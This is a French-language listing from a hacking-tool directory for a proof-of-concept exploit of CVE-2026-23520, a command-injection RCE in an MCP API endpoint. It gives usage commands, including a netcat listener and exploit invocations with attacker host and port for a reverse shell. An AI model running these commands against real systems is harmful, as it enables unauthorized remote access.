Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23520 — Preuve de concept d'exploitation pour CVE-2026-23520, une vulnérabilité d'injection de commandes dans le service de mise à jour d'Arcane, permettant l'exécution de code à distance via des requêtes API spécialement conçues. | Kitploit
Outils/GitHubGitHub/cypher-21/cve-2026-23520
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubcypher-21/cve-2026-23520

CVE-2026-23520

Preuve de concept d'exploitation pour CVE-2026-23520, une vulnérabilité d'injection de commandes dans le service de mise à jour d'Arcane, permettant l'exécution de code à distance via des requêtes API spécialement conçues.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23520

Preuve de concept (PoC) d'exécution de commandes à distance (RCE) sur l'API MCP


📌 Aperçu

Ce dépôt contient une preuve de concept (PoC) d'exploitation d'une vulnérabilité d'exécution de commandes à distance (RCE) affectant les applications qui exposent un point de terminaison d'API MCP vulnérable (généralement /api/mcp/connect).

La vulnérabilité permet l'exécution de commandes au niveau du système via une requête API spécialement conçue.


🚀 Démarrage rapide

1. Démarrer un écouteur

root@kitploit:~
nc -lvnp ATTACKER_PORT

2. Exécuter l'exploit

root@kitploit:~
python3 exploit.py TARGET --lhost ATTACKER_IP --lport ATTACKER_PORT

📥 Utilisation

root@kitploit:~
python3 exploit.py <target> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT> [options]

🔑 Arguments requis

ArgumentDescription
targetIP, domaine ou URL cible
--lhostIP de l'attaquant
--lportPort de l'attaquant

🔧 Arguments facultatifs

FlagDescription
-p, --portPort cible (défaut : 443)
-s, --schemehttp ou https (défaut : https)
-e, --endpointChemin du point de terminaison API
-t, --timeoutDélai d'expiration de la requête
-v, --verboseSortie de débogage

🧪 Exemples

root@kitploit:~
python3 exploit.py example.com --lhost 10.10.10.10 --lport 4444
root@kitploit:~
python3 exploit.py example.com -s http -p 80 --lhost 10.10.10.10 --lport 4444

🧠 Remarques

  • Un délai d'expiration n'indique pas nécessairement un échec.
  • Assurez-vous que votre écouteur est actif avant l'exploitation.
  • La charge utile suppose que /bin/bash est disponible.

⚠️ Avertissement

Réservé aux tests autorisés et à des fins éducatives uniquement.


👨‍💻 Auteur

Parosh B

Télécharger l’outil